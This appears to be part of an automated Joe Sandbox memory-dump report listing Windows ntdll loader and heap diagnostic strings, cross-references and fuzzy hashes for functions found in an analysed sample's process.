                                                • API String ID: 0-792281065
                                                • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                • apphelp.dll, xrefs: 01796496
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 3b79ead7dbbd7628b0e723ebab0858c40a364db81d9881053e91e2f4b7eb8400
                                                • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                • Opcode Fuzzy Hash: 3b79ead7dbbd7628b0e723ebab0858c40a364db81d9881053e91e2f4b7eb8400
                                                • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                Strings
                                                • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                Strings
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                • LdrpInitializeProcess, xrefs: 017DC6C4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: ecb4b292502aab3ba2aa566e6aa1a68f56361d9e66411762c1026eeda06c4742
                                                • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                • Opcode Fuzzy Hash: ecb4b292502aab3ba2aa566e6aa1a68f56361d9e66411762c1026eeda06c4742
                                                • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                APIs
                                                  • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                • @, xrefs: 017D8591
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                • LdrpInitializeProcess, xrefs: 017D8422
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                • .Local, xrefs: 017D28D8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                Strings
                                                • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                • LdrpDynamicShimModule, xrefs: 0180A998
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                • apphelp.dll, xrefs: 017C2462
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 017B3255
                                                • HEAP: , xrefs: 017B3264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                • LdrpCheckModule, xrefs: 0180A117
                                                • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                Strings
                                                • @, xrefs: 0185C1F1
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                • PreferredUILanguages, xrefs: 0185C212
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                • LdrpCheckRedirection, xrefs: 0182488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                Strings
                                                • LdrpInitializationFailure, xrefs: 018220FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 017AAA13
                                                • LdrResSearchResource Exit, xrefs: 017AAA25
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
